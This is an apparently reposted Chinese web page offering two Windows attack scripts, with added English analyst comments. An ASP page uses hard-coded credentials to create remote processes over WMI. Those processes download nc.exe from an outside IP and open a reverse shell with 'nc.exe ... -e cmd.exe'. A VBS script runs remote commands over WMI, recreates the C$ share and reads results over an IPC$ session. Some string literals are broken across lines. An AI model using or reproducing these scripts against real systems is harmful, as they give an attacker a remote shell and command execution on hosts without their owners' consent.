
wmiexec应用脚本

作者:佚名  来源:本站整理  发布时间:2008-4-19 21:25:58

<%
' Analyst notes (defender view; code unchanged). This ASP page opens an authenticated
' WMI/DCOM connection to a remote host with credentials that are literals in the page
' source, then issues three remote Win32_Process.Create calls that stage, run and
' connect back a reverse-shell payload on that host.
Server.ScriptTimeout=50000
set objlocator=server.createobject("wbemscripting.swbemlocator")
' Target address, account and password are hard-coded; anyone who can read the page
' source has them.
set objswbemservices=objlocator.connectserver("10.0.0.92","root/cimv2","User","xxddsfdf")
' NOTE(review): this string literal is split across two lines, which VBScript does not
' permit; it looks like an extraction artifact (a line break that was originally HTML)
' rather than the author's code — confirm against the original page.
Response.write "Creating the blankdoor ..
"
set objinstproc=objswbemservices.get("win32_process")
' Stage 1: a cmd /c echo writes c:\svrer.vbs on the remote host. That dropped script
' downloads nc.exe with Microsoft.XMLHTTP and saves it to c:\nc.exe with ADODB.Stream.
' c:\svrer.vbs and c:\nc.exe are the on-disk artifacts to look for on a host that is
' suspected of having been targeted by this page.
cmddoor="cmd /c echo Set xPost = CreateObject(^""Microsoft.XMLHTTP^""):xPost.Open ^""GET^"",^""http://222.241.118.227/nc.exe^"",0:xPost.Send():Set sGet = CreateObject(^""ADODB.Stream^""):sGet.Mode = 3:sGet.Type = 1:sGet.Open():sGet.Write(xPost.responseBody):sGet.SaveToFile ^""c:\nc.exe^"",2 >c:\svrer.vbs"
objinstproc.create(cmddoor)
' Sleep is the busy-wait Sub defined further down this page; VBScript allows a Sub to be
' called before the line that defines it. Return values of create() are never checked,
' so failures in any stage go unnoticed.
Sleep(1500)
' Same split-literal artifact as the first Response.write above.
Response.write "
Runing the blankdoor .."
' Stage 2: runs the dropped downloader script on the remote host.
objinstproc.create("cmd /c cscript c:\svrer.vbs")
Sleep(15000)
' Stage 3: starts nc.exe with -e cmd.exe towards the address and port in the literal,
' i.e. an outbound connection from the target that hands a command shell to whoever
' listens there. From the defender's side, every stage is a remote process creation
' over WMI performed with the web server's identity; remote Win32_Process.Create
' activity and the dropped files above are the things to detect and hunt for.
objinstproc.create("cmd /c c:\nc.exe 222.241.118.227 4321 -e cmd.exe")

Private Sub Sleep(n)
    ' Busy-wait for roughly n milliseconds (classic ASP has no native Sleep).
    ' DateDiff("s", ...) returns whole seconds, so fractional values round up:
    ' Sleep(1500) does not return before the difference reaches 2 seconds, and
    ' the worker thread spins for the entire wait.
    Dim startedAt
    startedAt = Now()
    Do While DateDiff("s", startedAt, Now()) < n / 1000
    Loop
End Sub
%>
这是一个远程连接，另一端用 nc.exe 监听。
 

还有一个VBS脚本

' Analyst notes (defender view; code unchanged). Runs one command on a remote host over
' WMI, collects its output through the C$ share, then cleans up. Target, account,
' password and the command are all hard-coded literals.
ip        =        "192.168.0.3"
uid        =        "administrator"
pwd        =        "123"
cmd        =        "ping 163.com"
' Connect to the host and execute the command; its stdout is redirected to
' c:\temp.txt on the target.
cmd1="cmd.exe /c"&cmd& " >c:\temp.txt"
' Named as a hidden-window flag; the value 12 is what gets assigned to
' Win32_ProcessStartup.ShowWindow below (presumably no console shown on the target —
' confirm against the WMI documentation for ShowWindow).
Const HIDDEN_WINDOW = 12
Set objLocator = CreateObject("WbemScripting.SWbemLocator")
' Authenticated WMI connection to the target's root\cimv2 namespace.
Set objService = objLocator.ConnectServer _
    (ip, "root\cimv2", uid, pwd)
Set objStartup = objService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
Set objProcess = objService.get("Win32_Process")
' Two remote process creations: the command itself, then "net share c$=c:\", which
' (re)creates the C$ share on the target so the output file can be read over SMB.
' errReturn is assigned but never checked, so a failed create() is silently ignored.
errReturn = objProcess.Create(cmd1, null, objConfig, intProcessID)
errReturn = objProcess.Create("net share c$=c:\", null, objConfig, intProcessID)
' Establish an IPC$ session to the target. The password is part of the net use
' command line, so it is visible in plain text to any process-creation logging on
' the machine running this script.
cmd="net use \\"&ip&"\ipc$ "&pwd&" /user:"&uid
Set objShell = CreateObject("Wscript.Shell")
objShell.Run(cmd),0,true
' Read the remote output file. NOTE(review): the UNC path repeats the target address
' as a literal instead of using ip, so changing ip alone breaks this step.
Const ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextFile = objFSO.OpenTextFile _
    ("\\192.168.0.3\C$\temp.txt", ForReading)
strContents = objTextFile.ReadAll
objTextFile.Close
' Show the command output.
Wscript.Echo strContents
' Clean up: delete the temp file on the target and drop the IPC$ session. The C$
' share created above is not removed, so it remains as a persistent change on the
' target after the script finishes.
errReturn = objProcess.Create("cmd.exe /c del c:\temp.txt", null, objConfig, intProcessID)
cmd2="net use \\"&ip&"\ipc$ /del"
objShell.Run(cmd2),0,true